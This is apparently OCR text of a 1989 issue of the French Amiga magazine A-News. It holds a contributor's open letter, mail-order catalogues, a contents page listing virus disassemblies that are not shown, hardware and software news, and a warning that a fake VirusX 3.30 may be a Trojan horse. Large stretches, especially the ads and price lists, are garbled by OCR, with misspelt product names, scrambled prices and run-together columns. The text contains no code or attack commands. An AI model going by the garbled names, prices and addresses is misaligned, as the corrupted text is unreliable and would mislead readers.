Sponsors

FacebookTwitterGoogle Bookmarks

Je remercie infiniment Bruce Lepper de bien vouloir accueillir dans A-news cette "lettre ouverte" adressée à l'intention de mes lectrices et lecteurs. Le fait d’avoir annoncé ma décision d'arrêter ma Newsletter (ainsi que mon support direct à 1'Amiga) a provoqué un "déluge" de lettres; la quantité est telle (une vraie avalanche) que j'en ai perdu le compte; au moment où j'écris, je ne suis même pas arrivé à les ouvrir toutes. Dans ces conditions il est évident que, même si j'essaie de répondre individuellement à chacun(e) cela pourra prendre plusieurs semaines; voire des mois. Vu les circonstances, je profite bien volontiers des pages de A-news pour répondre aux questions les plus couramment posées et donner ainsi satisfaction à la plupart de ceux qui m'ont écrit. Voilà donc en vrac mes réponses... Avant tout je vous confirme qu'avec A-news, je n'ai pas eu le moindre problème et ou conflit. Bien au contraire, Bruce Lepper et Rod Craig m'ont toujours soutenu même au delà du raisonnable et même si cela leur a coûté une bonne dose de "bâtons dans les roues" en plusieurs occasions. Deuxième point très important: je n'ai pas quitté 1'Amiga pour NeXT. Il est vrai que je m'intéresse très activement à NeXT (je ne l'ai jamais caché d'ailleurs), mais il est aussi vrai que j'avais écrit que j'espérais pouvoir vous dire "... ce qu'il sera possible de faire avec un Amiga et NeXT reliés ensemble." (cfr. A-news 8, CAN 18, page 8). Si je n'avais pas été démotivé, j'aurais bien pu continuer à suivre les deux machines en même temps. (D'ailleurs j'ai plus que dix ordinateurs chez moi, toutes marques confondues, et cela ne m'a jamais empêché de manifester ma passion pour l'Amiga.) Je ne quitte pas A-news pour Icônes: j'écrivais pour Icônes bien avant la sortie d'A-news. Si je continue à écrire pour Icônes, c'est que je trouve cette revue un support "logique" pour NeXT en général et pour la review de produits professionnels pour Amiga; pour ces derniers, j'écrirai des articles "ciblés" à caractère informatif (voire comparatif) et, donc, pas en tant que soutien à la machine, tel qu'ils pourraient l'être dans une revue "dédiée" telle que A-news. (Cela, donc, en parfaite cohérence avec ma décision.)

Click image to download PDF

Document sans nom LATTICE V 5.02 SCULPT -ANIMATE 4-D LE 68030 DE COMMODORE M4584- 13-20,00 F VIRUS IRQ DESASSEMBLE 794584020000 00130 Suisse : 5.50 Canada : 4.95 Belgique : 145 LE 1» DISTRIBUTEUR AMIGA PAR CORRESPONDANCE CONCEPT l_ POURQUOI COMMANDER
* | Nous faisons profiter aux particuliers rie notre expérience
rie grossiste.
2 Choisissez chez vous avec le catalogue Computer Concept, comme dans un magasin spécialisé Amiga et ce. Où due vous soyez.
3 Des prix sans surprise exprimés TTC. Pas de promo tapageuse, mais la garantie d’un rapport qualité prix constant.
Nous vous offrons les frais d'envoi.
Si vous commandez 3 articles différents, en codcou au choix : Sky Fox II Arkanoïd ou OelenOet ol ihe Crown AMIGRAPH Pour tout Achat d'une Unité Centrale A500 DELUXE PAINT II PAL EN CADEAU 21, rue Tournefort - 75005 PARIS Tél. : (1) 47.07.57.15 CONDITIONS SPECIALES EDUCATION RENSEIGNEZ VOUS !
AIWIGA 2000 AMIGA 2000 S BUREAUTIQUE] COMMENT COMMANDER Au téléphone Allo Catherine (1 ) 47.07.57.1 5 do 9 h 30 à 19 h du lundi au vendredi - samedi de 1 2 h à 19 h £3 Par courrier Remplissez le bon de commande ci-dessous.
Si vous commandez 3 articles et plus, un cadeau. Frais de port gratuits.
13 Règlement par chèque bancaire ou CCP à l'ordre de Computer Concept.
Sy Adressez le tout, bon de commande + chèque, è Computer Concept : 2 1. Rue Tournefort - 75005 Pans.
EMEU AMIGA 500 UC 512 Ko Ram. Souris, 1 lecteur 3‘ 1.2 Cadeau au choix : Toxtcraft Ou Pack 6 jeux + joystick UC I Mo 1 lecteur 3 1 2.
Aoure; 11.845 UC 1 Mo. 1 lecteur 3” 1 2.
Rromteur couleur A 1 084.
Sours 14.795 UC 1 Mo. 2 lecteurs 3" 1.2. moniteur couleur A 1084 scurs 1 6 440 UC. 1 Mo. 1 lecteur 3" 1 2.
D Dur 20 Mo. Moniteur couleur A 1 084. Souris 20.945
U. C. 1 Mo. 1 lecteur 3" 1:2.
1 lecteur 5"l 4. Carte XT.
D Dur 20 Mo. Moniteur couleur A 1084. Souris 26 625 AMIGA 2000 SM AMIGA 2000 DM Amiga 500 UC 51 2 Ko Ram. Souris 1 lecteur 3" 1.2 Moniteur couleur A 1084 Cadeau au choix : Textcraii ou Deluxe Paint il » Page Fiipper ou Park 10 jeux * joystick AMIGA 2000 20 AmiGA 2000 XT A&gis Oraw 2030 Aegis Arxmaior Aeyis Impact Aeyis Video Tuler An,ni aie 3 D Butcher Calligrapher Cao 3D Deluxe Paint II Pal Deluxe FhctoLab Deluxe Prir.t Deluxe Production Deluxe Video Diqi Paint Dynamic CAD Express Pamt FancyFcnt Fantavisior» Font Set GrebbH Huge Print Interohanger Page Flipper PhOton Paint Pixmate Pimt Master
Plus Pnsm ProVdéoPlus Sculpi 3 D lurooSn’ver The Director TV Text Pal TV Show Videoacapc 3 D [MUSIQUE Aeçis Audio Masier Aeqis Sonne Deluxe Music Drum Studio Dyramtc Drums Future Sound Instant Music Instant Music Rock & Roll interface Midi Simple Keyboard Coniroi Sequence Music Studio Perfect Sound A 1000 Pcrfect Sound A 500. 2000 Sound Sompler A 1 000 Sound Scape ProMid: Studio Synthia Ldserscript LogiMix Maxiplar 500 Français Maxipiar Plus François
P. tgASetter Français Prn Write Prolessional Paye Pubiishe'
ScnDbie Superbase Français Superbase Pro • Àpp PrOfTK)
Texictafi Plus Français VlPProfessional Visawrite Français
DEVELOPPEMENT; AmipaC Lathce C 4 C Macro Assembleur Manx Aztcc
C Commercial Manx A tec C Prof MCC Pascal il Pascal UCSD Power
Windows toi Modula 2 True Basic EXCLUSIVITÉ X-CAD DESIGNER
COMIC SETTER [COMMUNICATIONS!
Oigital Lmli Compoioiir Min 16 Emulateur Flarrrtel. Càhlo Amiq3 Tel A 1 000 - càbJe Amiga Tel A 500 2000 - câble BONNES IDEES!
PACK EXTENSION Extension mémoire 512 Ko pour A 500
* A 1010 lecteur externe 3" 1 2 2 .59i PACKAGE BUREAUTIQUE
Maxiplan . Superbase * Prownte en français avec manuel et
pochette spéciale 2 89 INCROYABLE- DIGIVIEW Gold (avec adapl)
2 000 A 10 1 0 lect. Supext. 1.290 ABLETTES GRAPHIQUES] Easvl
de Anakm Research la nouvelle tablette graphique sensitive pour
l’Amiqu Easyl A 500 doc. Et manuels fianças 4 590 Easyl A 1000
A 2000 doc ei manuels français - 5.390 IGITALISATlÔNi
IGENLOCK-j GENLOCK FRANÇAIS manuel français NC le inoms chei Ou
maiche connexion régie possible.
GENLOCK interne pour A 2000 2000 flBEB33-X- A 1010 lecteur SUPD. 3 ' 1 7 externe 1 2 90 A 2010 lecteur SUCO. 3“ 112 interné» 1 64 5 [EXTENSIONS MEMOIRE] Extension 512 K Ram Amiga 500 1390 Extension 2 Mo Amiga 2000 6 390 Extension pour Amiga 1 000 NC.
- Bfiw Modulateur Pal A 500 Câble Pernel A 500 Carte vidéo Pal A
2000 [DERNIER ARRIVAGE!
Poishe 944 Turbo Baltlc Chess Quad Iron Lord light Caméra Action Snulpt Animate 40 Gunship Amajing Compulng 20 000 IiOuob bous los mors Shanghai Arkanoïd Ai tic Fox Berbanans Balance of Power Buygy Boy Ctuysidl Hamniei Delenderol thç Crown Explora Faorv Talo Advontu'o Fhght Simulator II Insamly F ght Intercepter Jeanne d‘Arc LaGuerredes étalés La Panthère Rose Leader Bcard Collection Manoir de Morie Ville Passagers du Vent I * 2 Sky Fox 2 Starghder 2 Subbattie Test Dnve The Thiet Stouges Varnpiru Empire Voyogc au Centre de la Terre Zoom et beaucoup plus encore DEMANDE2 NOTRE CATALOGUE GRATUIT
Amiga Soundsand Graphics Manuel Am»ga Haro ware Manuel Amiga Intuition Manuel Rom Kerrel Device Livrede l'Amiga Dos Livre de l'Armga Basic LO Oiblc de l'Amiga SOS AMIGA Dos Livre du Langage Machine Trucs et Astuces Amiga Bien Débuter sur Amiga Programmer s Hanobcok Ref rOTILIT AIRES' Face Fioppy Accei.
Project D The Oernonstrator BON DE COMMANDE COMPUTER CONCEPT Envoyez avec votre règlement a Computer Concept : 21, rue Tournefort - 7500S Paris QTÉ DÉSIGNATION DE L'ARTICLE PrjX UNIT. PRIX TOTAL Je désire un catalogue Amiga oui non Nom--Date : Prénom - Signature : Ville _ Code Postal En cadeau pour 3 ariicles différents Def«ndor of th*.
Catalogue AMIGA ArVanDÎo Skyiox II Total 4news X JLTOOT POQJJffi ÆMMaA WÊÊÊmÊÊÊÊÊÊtÊÊÊÊÊÊÊtÊÊÊ mmÊÊÊÊÊÊttÊÊÊiKÊÊÊÊa mÊÊmÊÊÊÊÊÊÊÊiÊÊÊÊÊÊiÊÊÉ ZA Blis, 24500 Eymct, France. Tél 53-23-76-16, 53-58-71-46. FAX 53-23-75-35 SOMMAIRE EDITO Deluxe Paint III est l’un des meilleurs programmes pour Amiga - ou pour tout autre ordinateur personnel. Ce programme brille pour deux raisons : sa facilité d’emploi et sa puissance. Mais ce qui est plus étonnant c’est sa manière de mettre ces deux choses ensemble.
D’un coup, un enfant qui n’a jamais vu un ordinateur peut être en train de faire des animations de niveau quasi professionnel après seulement une heure d’expérimentation amusante... Alors achetez Dpaintin, rendez riche Electronic Arts et le programmeur, et l’importateur, et votre fournisseur de produits Amiga. Vous ne serez pas déçus par ce programme, vous serez le plus nanti de tous les utilisateurs d’ordinateurs familiaux, et en faisant ainsi vous montrerez à tout le monde que ça vaut le coup de développer des produits sur Amiga à condition qu’ils soient à la hauteur de la machine
elle-même.
NEWS NEWS NEWS .4-8 AMIEXPO NEW YORK ..6-8 MONTAGE - MEMOIRE POUR A1000 9-1:. CLI POUR DEBUTANTS ...12-14 MOVIESETTER TRAME DU YETI ....15-17 LA DEMO DU MOIS ..17 RAPIDO ASSEMBLEUR ...18-19 SCULPT4D - ESSAI ...20-21 PROFONTS ......21 YETI-AMIGA-VIDEO 1-2-3 ....22-24 LATTICE C V5.02 ..25 DESASSEMBLAGE VIRUS
IRQ ..26-27 DESASSEMBLAGE BYTE BANDIT ..28-29 ALGORITHMES ..30 LE COINC ......31 AMIGABASIC ..32 LE SOFT DU MOIS - ZAC MCKRACKEN 33 SOLUTION ZAC MCKRACKEN ..32 PROCHAINEMENT SUR VOS ECRANS 34 SUPER HANG ON . ...35 CRAZY CARS II ...36 FISH - LA SOLUTION ... 37 GALDREGON'S DOMAINE .37 DEEP
MODE D'EMPLOI ET DP ....38 PETITES ANNONCES, ABONNEMENTS 42 COURRIER ..39-40 LETTRE DE GIORGIO CUPERTINO ....41 PETITES ANNONCES ABONNEMENTS 42 SORTIE IMPRIMANTE PAGESTREAM ..43 Notre transporteur regrette ¦ d'avoir envoyé A-News à Lyon au lieu de Paris le mois dernier, ajoutant ainsi quelques jours supplémentaires à notre retard habituel.
Copyright NewsEdition, 1988. Reproduction interdile sans autorisation. Amiga, Amigados, Workbench sont des marques déposées de Commodore Inc. Les articles n'engagent que leurs auteurs Ce numéro a été mis en page sur Amiga avec Professional Page, Deluxe Paint II, Prowrile 2, Zuma Fontset ’ imprimante LaserWriter d'Apple.
A-News est édité et publié par NewsEdition SARL de Presse à ZA Bks, 24500 Eymo.
Tél 53-23-76-16 53-58-71-46 FAX53-23-75-35.
Directeur de la Publication.
Bruce Lepper NEWS NEWS NEWS NEWS NEWS Commodore France annonce la disponibilité du disque dur A590 pour l’Amiga 500 au prix de 4990F TTC (diminution de 1000F sur le prix initial annoncé). Le boîtier, qui s’enfiche directement sur la gauche de l’unité centrale de l’Amiga 500, comprend un disque dur 20 méga et des emplacements permettant d’augmenter la capacité mémoire de l’Amiga avec des modules de 512k, 1 méga, et 2 méga.
Le disque dur a un temps d’accès de 80 millisecondes. Il est doté d’une interface DMA (direct memory access) et un connecteur DB25 SCSI compatible Macintosh.
Livré en version autoboot (autodémarrage). Il fonctionne avec le Work- bcnch 1.3. ou avec la version 1.2 (mais n’est pas dans ce dernier cas autoboot).
Nous allons tester l’A590 dès que possible. A premier vu la vitesse de cette unité semble tout-à-fait correcte, malgré la présence d’un disque dur 80ms.
* * * A-News n’était pas invité à la conférence de presse
organisé par Commodore- France à l’hotel Intercontinental à
Paris le 29 mars. Mais le surlendemain nous avons reçu de
Sabine Hermantin, attachée de presse, le dossier de presse "de
la conférence î laquelle vous n’avez pu vous rendre". Voici
son contenu : Commodore annonce 50 000 Amiga vendus en France,
doublement du chiffre affaires, le lancement sur le marché
français de l’Amiga 2500 UX, et la "disponibilité" d’une carte
68030 pour A2000.
Avec une vitesse d’horloge de 25 Mhz, cette cane fait tourner la 2000 jusqu’à six fois plus vite. Hyaun co-processeur numérique 68882 (25 Mhz) en standard et 2 ou 4 méga de mémoire 32-bits, ainsi qu’une mémoire mone de 64k. La cane est "entièrement compatible avec AmigaDos ainsi qu’avec la plupart des logiciels Amiga".
Selon Commodore, un million d’Amiga étaient installés dans le monde à la fin de 1988, dont 680 000 en Europe. En France il se vend 1 Amiga 2000 pour 6 Amiga 500, en Europe cette proportion est de 1 à 7, et aux USA de 1 à 3.
Commodore France annonce le lancement en France d’une "package" pour publication assistée par ordinateur (PAO) et différentes "solutions vidéo”.
Le package PAO se compose d’un Amiga 2000 avec 3 méga de RAM, disque dur 40 méga autoboot, carte anti-scintillement "flickcr fixer", imprimante laser NEC LC890 à langage Postscript et 35 polices de caractère Adobe, Professional Page 1.2, Pro- fcssional Draw, et en option deux scanners à plat - un scanner noir et blanc de Canon (16 niveaux de gris) et un scanner Sharp (16 millions de couleurs), tous deux à résolution de 300 ppp. Un logiciel de pilotage du scanner est fourni permettant d’obtenir des films avec 16 millions de couleurs (environ deux heures d’attente pour les quatre films d’une
page quadri en format A4).
Dans les configurations haut de gamme Commodore parle du superbe moniteur 19" Moniterm, qui affiche 4 niveaux de gris en résolution de 1024x1008. Espérons que ce moniteur sera rapidement disponible en France à un prix pas trop faramineux. En attendant des nouvelles de Page Strcam (pour lequel un logiciel d’interfacage sera écrit), le seul logiciel de mise en page capable d’utiliser ce moniteur est Professional Page, qui n’affiche pas des double-pages (pour cela il faut attendre la version 2.0 dans quelques mois).
* * * Si vous êtes inquiet pour la santé de l'unite
d'alimentation de votre A500 (par exemple si vous utilisez
plusieurs lecteurs externes et d’autres périphériques
gourmandes en courant), vous serez intéressé par Micromegs, une
carte mémoire de 512k qui se substitue poux l'A501 de Commodore
mais qui consomme 75% de moins en énergie electrique.
Micromegs utilise les nouveau 1 mégabit DRAMS. Elle est vendu au prix de $ 169 aux Etats-Unis par le fabriquant, Memory and Storage Technology Inc, 3881 E Banatar Way, Chico, CA 95928 (tél 916-342-6278).
(photo page 6)
* * * Red Fish, organisateur majeur de programmes de domaine
public pour Amiga aux Etats-Unis, a changé d’adresse, voici la
nouvelle: Fred Fish, 1835 Easi Belmom Drive, Tempe, Arizona
85284. Pour commander, envoyer votre liste des disquettes
voulus avec $ 6 par disquette ($ 5 par disquette pour 10
disquettes ou davantage) en argent américaine (ou mandat postal
en dollars).
* * * C'est la guerre des nombres. Newtek préparait DigiPaint 2,
mais voyant Electronic Arts sortir Dpaint 3 ils ont décidé de
laisser tomber DigiPaint 2 et sortir DigiPaint 3. Manx
travaillait sur Aztec C v4.1 mais Lattice ont sorti la version
5.0 de leur compilateur C, donc bientôt (en luin oii Juillet?)
On verra Manx 5.0. Bien entendu, il ne faut pas croire., ce
n’est pas le stade d'avancement du logiciel qui change... c’est
le numéro. Dans quelques temps les éditeurs vont piger et se
mettre à sortir Dpaint V9.99, Aztec V99.999, etc. Entre
parenthèses, ceux qui achètent Manx 3.6a dès maintenant auront
droit à la version 5.0 gratis quand elle sorte...
* * * Comment créer presque instanément des diapositives couleur
à partir de l’écran de l’Amiga? Un nouveau procédé est annoncé
par une équipe anglaise, Burocare Graphics Design.
Son logiciel Screenshot permet au système Polaroid Palette to prendre les images directement de l'Amiga. Une opération de cette nature avait déjà était essayé en utilisant un boîtier d'interface, mais selon Burocare le Screenshot donne des résultats beaucoup plus satisfaisants. La qualité est telle qu’on peut aggrandir les diapositives jusqu'en taille 'poster’, dit Burocare.
L’ensemble comprenant l'interface Amiga, Polaroid Palette Image Recorder, Polaroid dédié 35mm dos d’appareil, appareil Polaroid 3"x4" pour epreuves et diapositives, 35mm auto "power processor", appareil pour couper et monter les diapositives, logiciel et manuel est vendu au prix de £1500 TTC. (Burocare, 211 Kenton Road, Harrow, Middlesex HA3 OHD, tél (19-44) 1 -907-3636, fax 907-0027).
NEWS NEWS NEWS NEWS NEWS Si on vous propose l’anti-virus VirusX version 3.30, refusez poliment mais fermement! C’est un faux, et pire, on le soupçonne d’être un "cheval de Troyes" qui pourrait mettre en péril les données sur votre disque dur. La version la plus récente sortie par l’auteur de la série des vrais VirusX, Steve Tibbet, est le 3.2.
* * * Videoshop, déjà implantée dans le 1er et le 14e
arrondissement de Paris, vient de créer "Intelcom,
l’informatique professionnelle", à 7 rue de l'Eglise, 92200
Neuilly sur Seine (tél 16-14640-73-26). VideoS- hop annonce
aussi une formation collective d’initiation à la pratique de
l’Amiga 500, par groupe de six personnes, au prix de 350F la
séance (tél 16-1-42-86-03-44).
* * * Les frimeurs peuvent s’acheter un boîtier plexi-glass,
entièrement transparent, pour leurs A2000, aux dimensions
exactes du boîtier d’origine. C’est surtout bien pour ceux qui
exposent leurs produits aux expos... Mais dcpcchez-vous,
seulement 50 de ces boîtiers seront construits. Prix 790 DM
(environ 2500F) chez Advanced Computer Design,
Carl-Schurz-Str.il, D- 2800 Bremen 1, Allemagne Fédérale (tél
19- 49 421-349-9517. Fax 421-349-9518).
* * * Le premier tome du nouveau Rom Kernel Manuel est en vente
aux Etats-Unis.
Son titre: "ROM Kernel Reference Manual: Includes & Autodocs". C’est un remplacement direct du Rom Kernel Manual Volume 2 (White) ou une mise à jour pour une grande partie du matériel dans les trois manuels précédentes d’Addison-Wesley (Exec, Libraries & Devices, et Intuition).
Ce manuel, écrit par l’équipe de Commodore-Amiga, décrit l’Amiga jusqu’à la Version 1.3 du logiciel système. E est à jour avec les Includes et Autodocs d’ 1.3 distribués sur disquette.
On y trouve :
- Une courte introduction aux règles de programmation sur Amiga.
- Un "autodoc" pour chaque call library, device et resource dans
le système (sauf dos.library).
- Une courte introduction expliquant ces trois principes
(libraries, devices et rcsources).
- Tous les fichiers include, C et Assembleur.
- Documentation pour les bibliothèques linker amigadib et
debug.lib, y compris des exemples en code source.
- De nombreux tableaux de référence, y compris (1) une référence
croisé de chaque symbole du système avec sa valeur résolue et
location dans les fichiers include: (2) un tableau "fonction"
donnant l’offset négatif pour chaque appel fonction du système;
(3) une référénee du structure assembleur qui liste chaque
structure en ordre mémoire avec l’offset de la base (parfait
pour débogguer au niveau assembleur.
- Une documentation complète d’IFF, y compris des mises à jour
des exemples codes et les spécifications FORM.
- Un petit index des fonctions.
Deux autres manuels viendront compléter le jeu : Amiga Hardware Reference Manuel mise à jour avec détails sur A500 et A2000; et Amiga Rom Kernel Manuel: Libraries and Devices, qui comprendra les informations d’ordre de travaux pratiques y compris sur la programmation d’intuition et d’Exec. Les manuels séparés sur Exec et Intuition n’existera plus.
L’éditeur de ces nouveaux manuels est toujours Addison-Wcsley.
SkyUne SHD30 Dur 30 Mo pour Amiga- Disque SHD30: Disque Dur Externe 30 Mo pour Amiga 500 et Amiga 1000, logé dans un boîtier alimenté.
4990 Frs TTC SHD2030: 4 30 Mo en interne pour Amiga 2000.
Les produits Skyllne sont distribués en France par : CIS 571, coure de la Libération 33400 TALENCE Manuel en français, disquette d’installation contenant le Driver Skyline permettant la gestion de 2 Disques Durs. Taux de transfert : 260 Ko sec.
Tel: 56 37 43 78 Fax: 56 04 08 95 ?a NEWS NEWS NEWS NEWS NEWS Le programme EducAmiga, lancé en mai l'année dernière par Commodore, a connu un 'Ton succès, tant au niveau français qu’européen", selon Laurence Constant, Directrice Marketing chez Commodore France. Le programme, qui permet aux écoles, collèges et autres organismes d’enseignement - et aux enseignants - de se procurer un Amiga 2000 avec écran couleur, carte XT, lecteur 5" et MS DOS 3.2 pour 12990F TTC. Sera prolongé pour une durée non encore déterminée.
Un des résultats de la réussite de ce programme a été des délais de livraison de la carte XT, qui est l’equivalent d’un PC-compatible sur une cane enfichable dans le
2000. Pour l’instant les acheteurs recevront d'abord leur A2000
et la carte XT quelque temps après.
* * * Au 1er mars les "patch editor librarians' suivants étaient
disponibles sur Amiga chez Iîr.T’s Music Software Inc (220
Boylston St. Chestnut Hill, MA 02167, Etats-Unis, tél
617-244-6954. Fax 617-244-5243) : CZ Rider, DX Heaven, ESQ'
apode ESQ- HSQ-80, 4-0P Deluxe, Kawai K-l, Kawai K-S, Lexicon
PCM-70, Oberheim Matrix 611000, Roland D-110, Roland D-50,
Roland MT-32, Soundlab Mirage.
* * * AmiExpo continue sa poussée aux Etats- Unis avec AmiFORUM
Texas, au DFW Hilton Executive Conférence Conter, Dallas, le 6
et 7 mai, et AmiEXPO Midwest, au Chicago Hyatt Rcgcncy,
Illinois Center. Le 28, 29 et 30 juin. Plus tard viendra AmiEX-
PO Santa Clara (20-22 octobre) et Amiga '89 à Cologne,
Allemagne Fédérale (10-12 novembre). L’AmiEXPO New York de mars
à établi un nouveau record pour ces rencontres, avec près de
12000 visiteurs.
* * * La société INELCO propose un genlock de qualité broadeast
de marque Magni sur Amiga 2000. Le genlock est sur deux cartes.
L’une s’enfiche dans le slot vidéo, l'autre dans un slot PC. Il y a un boîtier de commande qui permet de réaliser des "cuts" et des "fades", transitions entre la vidéo extérieure et le signal de l’Amiga.
Le genlock fournit un signal "key" de découpe extérieure pour une régie. H dis- pose d'une sélection des parties à incruster par niveau de luminance (des couleurs foncées aux couleurs claires et vice-versa.
Cette "solution vidéo broadeast" est fourni avec deux logiciels : Pro Video Plus de JDK Images et Vidéo Generic Master de Kimalek. Prix de l’ensemble, avec disque dur 20 méga. 46000F.
Spécial USENET par Raichman LAISSER L’AMIGA ALLUME EN PERMANENCE ?
Il y a en ce moment toute une discussion pour savoir s’il est préférable de laisser son Amiga allumé en permanence.
Art Gentry, de chez ATT à Kansas City, recommande de laisser tout le matériel (Amiga et disques durs) allumé en permanence. En effet, lorsqu'un composant électronique grille, ce n'est pas en général dû à une usure excessive mais à un choc physique ou électrique. En particulier, lorsque vous mettez votre machine en route.
Les universités et les sociétés qui possè dent beaucoup de matériel informatique font de même. (Cela dit, un miri-tip Batchman: faites une dérogation à cette règle par temps d'orage ou quand vous partez en vacances pour plusieurs jours).
AMIGATEX AmigaTeX est la version Amiga du fameux traitement de texte TeX sous UNIX. Il permet de réaliser des textes, graphismes et elTets spéciaux qui relèguent le meilleur des traitements de textes classiques au rang de programme pour TI57. En fait, on pourrait presque parler de "compila leur de textes" car il traite un fichier source et produit un fichier objet pour imprimante.
Hélas, ce n’est pas un WYSI- WIG (What You See Is What You G et), c’est-à-dire que vous ne voyez pas en tapant votre texte quel sera le résultat mais sa pu issance est à ce prix. Beaucoup d’utilisateurs, dont Lee Erickson. De Commodore Technology, déclarent être très satisfaits d’AmigaTeX.
Il est pleinement compatible avec TeX, ce qui permet d’utiliser sur Amiga des fichiers tapés sous UNIX.
D'autre part, il est possible d’imprimer les textes sur n'importe quelle imprimante puisque des drivers spéciaux sont fournis avec le programme. Les résultats sont qualifiés de géniaux sur laser ou HP Deskjet.
AmigaTeX (prononcez tec) est distribué par: Radical Eye Software, Box 2081, Stanford CA 94309 (Etats-Unis of course) MANX TARDE A CONTRE-ATTAQUER Lionel Hummel, de l'Université de l’Illinois, nous apprend que Manx version 5.0 ne sera pas prête avant Juin Juillet.
Le prix de l'upgrade serait de $ 80.
ELIMINER LES MESSAGES DU LATT1CE Autre grave sujet de préoccupation qui agite les newsgroups Amiga, comment supprimer les messages commerciaux (du style LATTICE V5.0, etc) émis par LC1 et LC2 lors d’une compilation?
Miguel Castclciro de l'INESC à Lisbonne et Eddy Carrol du Trinity Collège de Dublin nous proposent la solution suivante: LC1 -. Etc... LC2 -. Etc... A noter que LC ne répercute pas cette option sur LC1 et LC2 Qu’est ce qui fait chanter Paula en stéréo ??... SPECIAL AMIGA LES MEILLEURES CONDITIONS, LE PLUS GRAND CHOIX, LES NOUVEAUTES BEAUCOUP EN PARLENT NOUS ON LES PUBLIE
• PLUS DE 400 LOGICIELS
• TOUS LES PERIPHERIQUES POUR TOUS LES MODELES TOUS LES
PRODUITS POUR LA VIDEO (GENLOCKS - FRAME BUFFER - EFFETS
SPECIAUX - TITRAGES)
• SERVICE "NOUVEAUTES" DRAGON’S LAIR 471 F BALLISTIX 213 F
BLASTEROIDS 267 F SCULPT ANIMATE4D 5193 F DISQ. DUR 80 Mo pour
A2000 13900 F CARTE 68020 13795 F CARTE AT 2286 10342 F Modules
pour SCULPT 3D ou VIDEOSC. 3D (Architecture, Microbot, Future,
Human) 281 F VIDEOTOASTER Faites vous connaître si vous êtes
intéressé par cette carte vidéo SUPER HANG ON 314 F ADV. SKI
SIMULATOR N.C DISQ. DUR 30 Mo pour A2000 7700 F DISQ. DUR 40 Mo
pour A2000 9600 F HANDY SCANNER 4 3800 F DISQ. DUR 30 Mo 4900 F
pour A500 A1000 A 2000 + A 1084 § + CARTE XT + LECTEUR 5 1 4 -F
MS-DOS + GW-BASIC : 13 990 F (Offre réservée aux enseignants
d'établissements publics et privés. Bon de commande spécial sur
demande)
• PROMOTIONS "BI-CENTENAIRE" (jusqu’au 14 Juillet) 1789 F VIDEO
EFFECTS 3D SHAKESPEARE COPYIST PRO DIGIVIEW GOLD 1989 F AEGIS
DRAW 2000 K C S 1 6 IMPRIMANTE MPS 1230 GENLOCK A2300 pourA2000
• EXCLUSIF : PROFESSSONâl DRAW DESSIN VECTORISE 4096 COULEURS
SORTIE SUR IMPRIMANTE 24 AIGUILLES DE MEME QUALITE QU'EN LASER
: 1500 F
• LE CERCLE AMIGA (pas de droit d’entrée) STAGES
VIDEO DIGITALISATION les 27 MAI et 17 JUIN STAGES
PAO DIGITALISATION les 3 JUIN et 24 JUIN 750 F la journée
(gratuit en cas d’achat des logiciels) ESSONNE MAILING 3,
IMPASSE JULES DALOU 91000 EVRY Tél: 64.97.96.54 DISTRIBUTEUR &
CENTRE TECHNIQUE AGREE COMMODORE Cet encart a été intégralement
réalisé sur AMIGA avec le logiciel Professional Page et tiré
sur imprimante laser PostScript.® Prénom---------------- NOM
----- Adresse - demande de catalogue gratuit ? Info stages O
type de machine A5'00 0 A1000 ? A2000 0 NEWS NEWS NEWS NEWS
NEWS LES VIRUS : HALTE A LA PSYCHOSE Le dernier né des virus,
le virus IRQ, a créé l’inquiétude en innovant par son nouveau
mode de contamination. Je vous rappelle qu’il ne se transmet
pas par l’intermédiaire du boot block mais se loge dans les
exécutables. Ceci rend sa détection beaucoup plus difficile.
Il n’est pas méchant mais il faut s’attendre daas l’avenir à
voir des virus utilisant le même principe causer des
problèmes plus graves.
Ceci dit, il ne faut pas que cela tourne à la psychose et que vous ayez peur d'allumer votre Amiga. Nous essaierons d’une part, de vous aider à vous défendre (comme nous l’avons fait pour Y IRQ) et d’autre part, de démonter les fausses rumeurs.
VirusX 330: Non, ce n’est donc pas une nouvelle version du célèbre chasseur de virus! C’est un FAUX CHASSEUR et peut- être un vrai virus (page 5).
Enfin, il est temps de mettre définitivement un terme à certaines fausses rumeurs complètement stupides qui circulent encore:
- Non, le virus de l’horloge n’existe pas car il ne PEUT PAS
exister comme le craignait Georgio Cupcrtino dans A-News n'1.
L’horloge interne n’a que quelques octets de mémoire (l’information vient de Commodore Technology) cl ne peut de toute façon pas contenir de programme puisque son contenu change en permanence. Il n’y a pas de mémoire supplémentaire et donc pas de risque qu’un virus subsiste après l’arrct de la machine.
- Non, il n’est pas possible d’écrire sur une disquette protégée
contre l’écriture (et pourtant, il y en a encore qui affirment
le faire!). Ici aussi, les spécialistes de Commodore
Technology nous ont confirmé que la protection d’écriture sur
une disquette est gérée par l’électronique du lecteur de dis
quette et non pas par logiciel. Aucun programme ne peut rien
contre ça.
Par conséquent, vous pouvez considérer la protection d’écriture de votre disquette comme un rempart inviolable contre lequel s écraseront mollement tous les horribles virus gluants. Le problème est plus délicat avec un disque dur mais il ne semble pas qu’il circule actuellement de virus s’attaquant spécifiquement à eux.
BATCHMAN Voici Animale Turbo Board II, une carte accélératrice bon marché fabriquée en Allemagne Fédérale par ADVANCED COMPUTER DESIGN et distribuée en France par M.A.D. (Modem Applications Development, Division Import, 82 av Général Lcclcrc, 92100 Boulogne, tél 1-42-80-64-02) Il y a trois processeurs à bord - MC 68000, MC68020 à 16MHz„ et coprocesseur 68881 ou 68882. Un commutateur permet de choisir le processeur "actif, pour ceux qui préfèrent passer leur jeux à la vitesse normale.. Disponible pour Amiga 500, 1000, et 2000. La carte de base, Animale Turbo Board I, est similaire mais
ne comporte pas de MC68000, seulement un 68020 et coprocesseur 68881 ou 68882.
Ci-dessous - Animale Turbo Board III, pour l’Amiga 2(XK). . Selon ACD c est la première carte pour F Amiga avec option d’installer jusqu’à 1 méga de RAM statique. Elle s’cnfichc dans le slot MMU.
...C’est compact, c’est Hard, mais c’est Soft, c’est disponible chez tous les bons revendeurs Amiga, en 2, chez Boulanger !... C’est...??
DPAINTII G VIDEO 1.2 PAL PHOTOLAB PHOTON PAINT II YIDEOSCAPE DESIGN 3D SCULPT 30 ANIMATE 3D INTERFONT DIGIVIEW GOLD FAMAViSfON TVLEXT PROVIDEO VIDEO TITLER THE DIRECTOR PRO. DRAW 700 700 630 1290 1549 890 899 1450 950 2250 509 359 2500 1000 679 1770 DELUXE MUSIC 700 SONIX 690 Dr.T’s (KCS) 1999 AUDIO MASTËR II 710 TRACK 24 590 LANGA. ET UTIL.
